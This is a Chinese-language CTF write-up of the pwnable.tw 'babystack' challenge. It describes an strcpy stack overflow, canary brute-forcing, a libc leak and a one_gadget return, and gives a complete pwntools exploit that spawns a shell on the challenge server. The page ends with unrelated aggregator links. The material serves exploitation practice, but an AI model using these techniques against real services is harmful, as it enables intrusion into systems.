pwnabletw-babystack

2023-05-16

BabyStack

思路

危险函数，strcpy。
在copy的时候strcpy看似没有问题，但是由于src的内容并没有清空，还保存着被销毁栈的原有数据，而strcpy是根据"\x00"来判定的，所以造成了栈溢出。
login的限制可以用"\x00"绕过。
首先通过login函数中的strcmp，把canary值爆破出来。
然后利用copy函数栈上的垃圾数据中保存的一些libc的相关地址，将其拷贝到canary的地址，然后继续爆破，就可以得到libc的基址。
给了libc，一发one_gadget。

exp

这里卡了很久的一个地方是python3的p64返回的是bytes类型，而且bytes(s,encoding=“utf8”)和ascii都不对，手动改。
remote跑一次需要20多分钟。

from pwn import * 
from time import sleep
import os
import sys

elfPath = './babystack'
libcPath = '../libc_64.so.6'
remoteAddr = 'chall.pwnable.tw'
remotePort = '10205'

context.log_level = 'debug'
context.binary = elfPath
context.terminal = ['tmux', 'splitw', '-h']

elf = context.binary
if sys.argv[1] == 'l':
    sh = process(elfPath)
    libc = elf.libc
else:
    if sys.argv[1] == 'd':
       sh = process(elfPath, env = {'LD_PRELOAD': libcPath})
    else:
       sh = remote(remoteAddr,remotePort)
       context.log_level = 'info'
    if libcPath:
       libc = ELF(libcPath)

def blast(sz,al = ""):
    rcd = al
    move = 0
    for round in range(0,sz):
        tag = False
        for i in range(0,0x100):
            if i == 0:
                continue
            test = rcd + chr(i)
            sh.sendlineafter(">>","1")
            sh.sendafter(":", test + "\n")
            ret = sh.recv(1)
            if ret == b'L':
                tag = True
                rcd = test
                sh.sendlineafter(">>","1")
                break   
        if tag is False:
            rcd += chr(0)

    return rcd

if __name__ == '__main__':
    canary = blast(0x10)
    c = b""
    for i in canary:
        print(ord(i))
        c += bytes([ord(i)])
    print(str(c))
    sh.sendlineafter(">>", '1')
    sh.sendafter(":", "\x00" + "a" * 0x47)
    sh.sendlineafter(">>", "3")
    sh.sendafter(":","A") # put IO_file_.addr at random_array's addr
    # leak libc addr
    sh.sendlineafter(">>","1")
    IO_file_9 = u64(blast(6,"a" * 0x8)[8:15] + "\x00\x00")
    IO_file_addr = IO_file_9 - 9
    libc_base = IO_file_addr - libc.symbols["_IO_file_setbuf"]
    success("libc_base:" + hex(libc_base))
    one_gadget = [0x45216, 0x4526a, 0xef6c4, 0xf0567]
    shell_addr = libc_base + one_gadget[0]
    
    sh.sendlineafter(">>", '1')
    payload =  b"\x00" + b"A"*0x3f + c + b"A" * 0x18 + p64(shell_addr)
    sh.sendlineafter(":",payload)
    sh.sendlineafter(">>","3")
    sh.sendafter(":","A")
    sh.sendlineafter(">>","2")

    # sh.sendline("cat /home/babystack/flag")
    sh.interactive()

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

pwnabletw

babystack

pwnabletw-babystack 的相关文章

如何理解 JS 中的异步

了解异步前 xff0c 先得知道什么是单线程单线程只有一个线程 xff0c 只能做一件事代码示例 console log 1 alert 39 hello 39 console log 2 点击确认后 xff0c 才会打印出 2 JS
nodejs的特点(讲解的很清晰)

1 异步I O 在Node中 xff0c 绝大多数的操作都以异步的方式进行调用 Ryan Dahl排除万难 xff0c 在底层构建了很多异步I O的API xff0c 从文件读取到网络请求等 xff0c 均是如此这样的意义在于 xff0c
如何优雅地在word中插入代码

打开这个网址 xff1a https highlightcode com
conda install和pip install有什么区别?

pip pip install xxx 在特定环境里使用pip xff0c 下载的包会存在特定环境的目录里面 xff0c 例如 D Anaconda3 envs nlp Lib site packages fasttext 使用pip un
Ubuntu下安装Clion

前言 CLion 是一款由 JetBrains 开发的 C 43 43 集成开发环境 xff08 IDE xff09 xff0c 它拥有许多强大的功能 xff0c 如代码自动完成调试器版本控制等等 CLion本身是收费软件 xff0c
如何查看docker容器里的操作系统

在linux中 xff0c 我们可以用uname命令来查看当前的操作系统在docker容器里 xff0c 我们要查看容器操作系统时正确的方法是 xff1a cat etc issue 错误姿势 xff1a cat process ver
win10关于hyper-v除了在主板设置cpu虚拟化VX-T/AMD-V，还需要在CMD执行以下命令

I managed to resolve the issue but not by uninstalling Hyper V I saw a couple of suggestions but I find this one situabl
人话解读GPLv3

GPL最新版本为v3 xff0c 在开源软件许可证的采用量上 xff0c 位列前三名或者前四名其他三位是MIT Apache GPLv2 如果你浸淫软件业已久 xff0c 作为开源界如雷贯耳的许可证 xff0c 无论如何也要了解一下 xf
R语言＜-和=赋值的区别-实验

R系统版本 version platform x86 64 pc linux gnu arch x86 64 os linux gnu system x86 64 linux gnu status major
rust-crate

让我们来看看创建包的时候会发生什么首先 xff0c 我们输入命令 cargo new xff1a cargo new my project Created binary application my project ls my proje
严重性代码说明项目文件行禁止显示状态错误 C3861 “time”: 找不到标识符 WindowsProject1 d:\新建文件夹\windowsproject1\windowspro

VS 2017用笔记本运行时 xff0c 必须要加上而调用函数time时 xff0c 直接写个 include lt time h gt 也会报错未声明标识符 xff0c 虽然有头文件 xff0c 但是任然报错解决方法 xff1a
selenium常用API

1 八大元素定位方式 driver find element by id text 通过id去定位控件在web端ID一般是唯一的 span class token comment lt i id 61 34 cart num 34 gt
AMD GPU驱动,ROCM,Pytorch安装教程(A卡6700xt)

我用的操作系统为ubuntu20 04 其他系统应该类似 xff0c 只是命令稍有不同安装AMD GPU驱动 AMD驱动下载地址 https www amd com en support kb release notes rn amdgp
windows子系统无法启动 wsl命令无效 docker启动报错解决方法

windows子系统无法启动wsl命令无效解决方法 xff1a 问题 xff1a wsl l v命令无反应Windows Terminal 不显示 ubuntudocker启动报错重置网络按键盘Win 43 R打开 34 运行 34 输
gitlab设置中文或者其他语言，gitlab汉化

前言 xff1a gitlab是我们国内非常好用的git工具 xff0c 但是他默认是英文版本的 xff0c 很多小伙伴可能用不习惯 xff0c 这里分享下他更改为中文版的办法操作 xff1a 1 英文版本 xff1a 登录后 setti
CEF：C++和JS交互

C 43 43 和JS交互V8原理 xff1a https github com fanfeilong cefutil blob master doc content register v8 extension md CEF一个页面的框架如

随机推荐

计算机应用研究、计算机工程与应用、计算机科学与探索投稿经验

一计算机应用研究 xff08 北大核心 xff0c CCF c CCFT3类刊 xff09 总体审稿周期一个多月 xff0c 投过两次算法研究类文章 xff0c 从投稿到正刊录用不超过40天感觉要求不是很高 xff0c 只有一个外审专家
Linux修改系统时间

一查看和修改Linux的时区查看当前时区命令 xff1a date R 修改设置Linux服务器时区命令 xff1a tzselect 我这里是使用的CentOS复制相应的时区文件 xff0c 替换系统时区文件 xff1b 或者创建
ESP32超详细学习记录：获取B站粉丝数

获取粉丝数需要知道API调用接口怎么获得调用的API接口呢 xff1f 以罗翔老师的bilibili账号为例子本人用的Firefox浏览器 xff0c 其他浏览器操作与Firefox类似 xff0c 在此只是提供获取API的途径 xff
ESP32超详细学习记录：NTP同步时间

本来想从开源项目找找灵感的 xff0c 但是 xff01 那些代码真烂 xff01 xff01 xff01 xff01 xff01 开源项目免不了的就是抄抄抄代码 xff0c 想知道 NTP 是怎么实现的还要读那一堆烂代码 xff0c 烦
VS 2015运行报错

VS 2015运行报错 xff1a L N K 1104 无法打开文件 kernel 32 lib xff0c L N K 1158 xff1a 无法运行 34 r c e x e xff0c L N K 156 必须定义入口点 34 的问
fatal: remote error: access denied or repository not exported: /x264

root 64 ubuntu opt git clone git git videolan org x264 正克隆到 39 x264 39 fatal remote error access denied or repository no
64位ubuntu虚拟机编译后可运行，32位的arm不能运行的原因

这两天遇到一个怪事 xff0c 就是在64位虚拟机上使用asn1c工具编译生成的asn源文件 xff0c 交叉编译生成静态库 xff0c 在虚拟机上跑的好好的 xff0c 但是在arm上跑的时候无法解码 xff0c 最后查明原因是asn1c
如何使用交叉编译将大量源文件生成动态库

今天要把算法包生成一个动态库放在ARM上调用运行 xff0c 特此记录一下给大家参考 1 首先将算法文件夹中的源程序生成 o文件 arm span class token operator span linux span class tok
结构体赋值运行时出现段错误（核心已转储）

今天给嵌套结构体赋值的时候编译没问题 xff0c 但是运行总是段错误 xff0c 后来发现是忘了分配动态内存 xff0c 记得用calloc分配 xff0c 实际结构体嵌套比较复杂 xff0c 在这里举个简单的例子给大家看看 xff0c 引
如何将一段字符串在word中，自动删除换行，两两之间增加空格键

我们在拉取十六进制数据分析时 xff0c 经常遇到对方只给一条长长的字符串 xff0c 当然 xff0c 我们可以通过代码的方式进行空格添加 xff0c 方便阅读 xff0c 但是有时候身边没有编译工具或者流程复杂 xff0c 介绍一个用w
Python学习第5天——洛谷刷题（顺序结构）、循环

Python学习第5天 1 洛谷刷题1 1 顺序结构1 2 高精度 2 循环2 1 while循环2 2 for循环2 3 range xff08 xff09 函数2 4 用for循环绘图练习2 4 1 绘制同心圆2 4 2 绘制棋盘格 1
如何定义字符串

如何定义字符串一维和二维的都可以 xff1b 一维的情况如下 xff1a 1 xff0c char string0 10 2 xff0c char string1 61 34 prison break 34 3 xff0c char st
static全局变量与普通的全局变量的区别？

1 static全局变量与普通的全局变量有什么区别 xff1f static局部变量和普通局部变量有什么区别 xff1f static函数与普通函数有什么区别 xff1f 答 xff1a 全局变量外部变量的说明之前再冠以static 就
动态存储方式和静态存储方式

从变量的作用域的角度来观察 xff0c 变量可以分为全局变量和局部变量 xff1b 全局变量都是存放在静态存储区中的因此它们的生存期是固定的 xff0c 存在于程序的整个运行过程局部变量 xff0c 如果不专门声明存储类别 xff0c
c语言中的return 0有什么用？

return 0是正常退出 xff0c return 非零是异常退出 xff0c 这是返回给控制台的 xff0c 不在编的程序的控制范围内 xff0c 是给操作系统识别的 xff0c 对你的程序无影响如果是C中 xff0c 定义void
JAVA代码实现字符串匹配（一）——BF、KMP

话不多说 xff0c 直接进入主题 xff1a 题目描述 xff1a 给定两个字符串text和pattern xff0c 请你在text字符串中找出pattern字符串出现的第一个位置 xff08 下标从0开始 xff09 xff0c 如果
pwntools, terminal =‘tmux‘ 报错

pwntools terminal 61 tmux 报错 Traceback most recent call last File exp py line 4 in gdb attach File home pwn pwn lib pyth
更改手动导入的wsl的默认登录用户

导入了一个wsl后 xff0c 每次登录都是root用户 xff0c 这个就有点不太好网上的教程都是说在ps里用分发版的对应exe文件来设置默认用户 xff0c 但是导入的这个wsl我没找到这个exe 找了半天然后看了微软官方的教程 xf
v8安装fetch不上

大佬方案 xff1a 白嫖github action 感谢大佬
pwnabletw-babystack

BabyStack 思路危险函数 xff0c strcpy 在copy的时候strcpy看似没有问题 xff0c 但是由于src的内容并没有清空 xff0c 还保存着被销毁栈的原有数据 xff0c 而strcpy是根据 34 x00 34

pwnabletw-babystack

BabyStack

思路

exp

pwnabletw-babystack 的相关文章

随机推荐

热门标签